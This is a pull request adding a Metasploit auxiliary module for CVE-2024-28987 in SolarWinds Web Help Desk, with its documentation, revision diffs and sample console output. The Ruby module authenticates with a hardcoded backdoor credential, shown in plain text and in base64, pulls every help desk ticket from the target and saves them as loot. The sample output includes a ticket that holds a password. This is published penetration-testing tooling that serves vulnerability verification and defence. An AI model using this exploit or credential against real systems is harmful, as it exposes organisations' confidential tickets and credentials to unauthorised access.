### PR TITLE
SolarWinds Web Help Desk Backdoor (CVE-2024-28987) Module

### DIFF
--- a/documentation/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.md
+++ b/documentation/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.md
@@ -29,7 +29,7 @@ This should return all the tickets from the Web Help Desk platform.
 
 ## Options
 
-### TICKETSTODUMP
+### TICKET_COUNT
 The number of tickets to dump to the terminal.
 
 ## Scenarios

--- a/documentation/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.md
+++ b/documentation/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.md
@@ -27,6 +27,11 @@ msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > run
 
 This should return all the tickets from the Web Help Desk platform.
 
+## Options
+
+### TICKETSTODUMP
+The number of tickets to dump to the terminal.
+
 ## Scenarios
 
 Running the exploit against Web Help Desk v12.8.1 on Windows 22H2 should result in an output similar to the following:
@@ -35,8 +40,10 @@ Running the exploit against Web Help Desk v12.8.1 on Windows 22H2 should result 
 msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > run
 [*] Running module against 192.168.217.145
 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
 [*] Authenticating with the backdoor account "helpdeskIntegrationUser"...
-[+] Successfully authenticated and tickets retrieved:
+[+] Successfully authenticated and tickets retrieved. Displaying the first 2 tickets retrieved:
 [+] [
   {
     "id": 2,
@@ -46,7 +53,7 @@ msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > run
     "shortDetail": "Hi,\r\n\r\nhere is your super secure password: foo\r\n\r\nYour IT Support",
     "displayClient": "No Client",
     "updateFlagType": 2,
-    "prettyLastUpdated": "18 minutes ago",
+    "prettyLastUpdated": "13 hours ago",
     "latestNote": null
   },
   {
@@ -57,9 +64,10 @@ msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > run
     "shortDetail": "Congratulations! You have successfully installed Web Help Desk. Further configuration options are...",
     "displayClient": "Demo Client",
     "updateFlagType": 2,
-    "prettyLastUpdated": "4 hours ago",
+    "prettyLastUpdated": "17 hours ago",
     "latestNote": null
   }
 ]
+[+] Saved 2 tickets to /home/asdf/.msf4/loot/20240926004744_default_unknown_solarwinds_webhe_825328.txt
 [*] Auxiliary module execution completed
 ```

--- a/documentation/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.md
+++ b/documentation/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.md
@@ -1,0 +1,65 @@
+## Vulnerable Application
+
+This module exploits a backdoor in SolarWinds Web Help Desk <= v12.8.3 (CVE-2024-28987) to retrieve all tickets from the system.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://downloads.solarwinds.com/solarwinds/Release/WebHelpDesk/12.8.1/WebHelpDesk-12.8.1-x64_eval.exe).
+
+Installation instructions are available [here]
+(https://documentation.solarwinds.com/en/success_center/whd/content/whd_installation_guide.htm).
+
+**Successfully tested on**
+
+- SolarWinds Web Help Desk v12.8.1 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/gather/solarwinds_webhelpdesk_backdoor 
+msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > set RHOSTS <IP>
+msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > run
+```
+
+This should return all the tickets from the Web Help Desk platform.
+
+## Scenarios
+
+Running the exploit against Web Help Desk v12.8.1 on Windows 22H2 should result in an output similar to the following:
+
+```
+msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > run
+[*] Running module against 192.168.217.145
+
+[*] Authenticating with the backdoor account "helpdeskIntegrationUser"...
+[+] Successfully authenticated and tickets retrieved:
+[+] [
+  {
+    "id": 2,
+    "type": "Ticket",
+    "lastUpdated": "2024-09-25T08:54:13Z",
+    "shortSubject": "Password reset",
+    "shortDetail": "Hi,\r\n\r\nhere is your super secure password: foo\r\n\r\nYour IT Support",
+    "displayClient": "No Client",
+    "updateFlagType": 2,
+    "prettyLastUpdated": "18 minutes ago",
+    "latestNote": null
+  },
+  {
+    "id": 1,
+    "type": "Ticket",
+    "lastUpdated": "2024-09-25T05:15:17Z",
+    "shortSubject": "Welcome to Web Help Desk",
+    "shortDetail": "Congratulations! You have successfully installed Web Help Desk. Further configuration options are...",
+    "displayClient": "Demo Client",
+    "updateFlagType": 2,
+    "prettyLastUpdated": "4 hours ago",
+    "latestNote": null
+  }
+]
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb
+++ b/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb
@@ -22,7 +22,6 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987'],
           ['URL', 'https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2'],
           ['URL', 'https://www.horizon3.ai/attack-research/cve-2024-28987-solarwinds-web-help-desk-hardcoded-credential-vulnerability-deep-dive/'],
-
         ],
         'DisclosureDate' => '2024-08-22',
         'DefaultOptions' => {
@@ -59,14 +58,13 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def auth
-    res = send_request_cgi(
+    send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets'),
       'headers' => {
         'Authorization' => 'Basic ' + Rex::Text.encode_base64('helpdeskIntegrationUser:dev-C4F8025E7')
       }
     )
-    res
   end
 
   def run

--- a/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb
+++ b/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb
@@ -46,15 +46,15 @@ class MetasploitModule < Msf::Auxiliary
 
   def check
     @auth = auth
-    return Exploit::CheckCode::Unknown('Target is unreachable') unless @auth
+    return CheckCode::Unknown('Target is unreachable') unless @auth
 
     if @auth.code == 401
-      return Exploit::CheckCode::Safe
+      return CheckCode::Safe
     elsif @auth.code == 200
-      return Exploit::CheckCode::Appears
+      return CheckCode::Appears
     end
 
-    Exploit::CheckCode::Unknown
+    CheckCode::Unknown
   end
 
   def auth

--- a/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb
+++ b/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Auxiliary
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets'),
       'headers' => {
-        'Authorization' => 'Basic ' +  Rex::Text.encode_base64('helpdeskIntegrationUser:dev-C4F8025E7')
+        'Authorization' => 'Basic ' + Rex::Text.encode_base64('helpdeskIntegrationUser:dev-C4F8025E7')
       }
     )
     res
@@ -75,12 +75,12 @@ class MetasploitModule < Msf::Auxiliary
     body = @auth.body
     fail_with(Failure::UnexpectedReply, 'Unexpected Reply: ' + @auth.to_s) unless body.include?('shortSubject')
 
-    report_service( 
-        host: rhost, 
-        port: rport, 
-        proto: 'tcp', 
-        name: 'SolarWinds Web Help Desk'
-      ) 
+    report_service(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: 'SolarWinds Web Help Desk'
+    )
 
     jbody = JSON.parse(body)
     print_good('Successfully authenticated and tickets retrieved. The first 1000 characters are displayed below:')
@@ -88,13 +88,13 @@ class MetasploitModule < Msf::Auxiliary
 
     file = store_loot('solarwinds_webhelpdesk.json', 'text/json', datastore['USER'], jbody)
     print_good("Saved tickets to #{file}")
-    
+
     report_vuln(
-          host: rhost,
-          port: rport,
-          name: name,
-          refs: references,
-          info: 'The backdoor helpdeskIntegrationUser:dev-C4F8025E7 works.'
-        )
+      host: rhost,
+      port: rport,
+      name: name,
+      refs: references,
+      info: 'The backdoor helpdeskIntegrationUser:dev-C4F8025E7 works.'
+    )
   end
 end

--- a/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb
+++ b/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb
@@ -53,11 +53,15 @@ class MetasploitModule < Msf::Auxiliary
       }
     )
 
-    fail_with(Failure::UnexpectedReply, 'Unexpected Reply') unless res&.code == 200
+    fail_with(Failure::UnexpectedReply, 'Unexpected Reply: ' + res.to_s) unless res&.code == 200
 
-    json = res.get_json_document
-    if json.to_s.include?('shortSubject')
-      print_good('Successfully authenticated and tickets retrieved:' + json.to_s)
+    body = res.body
+    if body.include?('shortSubject')
+      jbody = JSON.parse(body)
+      print_good('Successfully authenticated and tickets retrieved:')
+      print_good(JSON.pretty_generate(jbody))
+      file = store_loot('solarwinds_webhelpdesk.json', 'text/json', datastore['USER'], jbody)
+      print_good("Saved tickets to #{file}")
     end
   end
 end

--- a/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb
+++ b/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb
@@ -83,11 +83,12 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     jbody = JSON.parse(body)
-    print_good('Successfully authenticated and tickets retrieved. The first 1000 characters are displayed below:')
-    print_good(JSON.pretty_generate(jbody).slice(0, 1000))
+    print_good("Successfully authenticated and tickets retrieved. Displaying the first #{datastore['TICKETSTODUMP']} tickets retrieved:")
+    tickets_to_display = jbody.first(datastore['TICKETSTODUMP'])
+    print_good(JSON.pretty_generate(tickets_to_display))
 
     file = store_loot('solarwinds_webhelpdesk.json', 'text/json', datastore['USER'], jbody)
-    print_good("Saved tickets to #{file}")
+    print_good("Saved #{jbody.length} tickets to #{file}")
 
     report_vuln(
       host: rhost,

--- a/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb
+++ b/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb
@@ -1,0 +1,63 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SolarWinds Web Help Desk Backdoor (CVE-2024-28987)',
+        'Description' => %q{
+          This module exploits a backdoor in SolarWinds Web Help Desk <= v12.8.3 to retrieve all tickets from the system.
+        },
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'Zach Hanley' # Discovery & PoC
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-28987'],
+          ['URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987'],
+          ['URL', 'https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2'],
+          ['URL', 'https://www.horizon3.ai/attack-research/cve-2024-28987-solarwinds-web-help-desk-hardcoded-credential-vulnerability-deep-dive/'],
+
+        ],
+        'DisclosureDate' => '2024-08-22',
+        'DefaultOptions' => {
+          'RPORT' => 8443,
+          'SSL' => 'True'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Web Help Desk', '/'])
+      ]
+    )
+  end
+
+  def run
+    print_status('Authenticating with the backdoor account "helpdeskIntegrationUser"...')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets'),
+      'headers' => {
+        'Authorization' => 'Basic aGVscGRlc2tJbnRlZ3JhdGlvblVzZXI6ZGV2LUM0RjgwMjVFNw=='
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Unexpected Reply') unless res&.code == 200
+
+    json = res.get_json_document
+    if json.to_s.include?('shortSubject')
+      print_good('Successfully authenticated and tickets retrieved:' + json.to_s)
+    end
+  end
+end


### PR DESCRIPTION
This is a new module which exploits a backdoor in SolarWinds Web Help Desk (CVE-2024-28987) <= v12.8.3 to retrieve all tickets from the system.

## Verification Steps

1. Download the installer from the [vendor](https://downloads.solarwinds.com/solarwinds/Release/WebHelpDesk/12.8.1/WebHelpDesk-12.8.1-x64_eval.exe) and deploy it.
2. Start `msfconsole`
3. `use auxiliary/gather/solarwinds_webhelpdesk_backdoor`
4. `set RHOSTS <IP>`
5. `run`

```
msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > set RHOSTS 192.168.217.145
RHOSTS=> 192.168.217.145

msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > run
[*] Running module against 192.168.217.145

[*] Authenticating with the backdoor account "helpdeskIntegrationUser"...
[+] Successfully authenticated and tickets retrieved:
[+] [
  {
    "id": 2,
    "type": "Ticket",
    "lastUpdated": "2024-09-25T08:54:13Z",
    "shortSubject": "Password reset",
    "shortDetail": "Hi,\r\n\r\nhere is your super secure password: foo\r\n\r\nYour IT Support",
    "displayClient": "No Client",
    "updateFlagType": 2,
    "prettyLastUpdated": "22 minutes ago",
    "latestNote": null
  },
  {
    "id": 1,
    "type": "Ticket",
    "lastUpdated": "2024-09-25T05:15:17Z",
    "shortSubject": "Welcome to Web Help Desk",
    "shortDetail": "Congratulations! You have successfully installed Web Help Desk. Further configuration options are...",
    "displayClient": "Demo Client",
    "updateFlagType": 2,
    "prettyLastUpdated": "4 hours ago",
    "latestNote": null
  }
]
[*] Auxiliary module execution completed
```

**Successfully tested on**

- Web Help Desk v12.8.1 on Windows 22H2 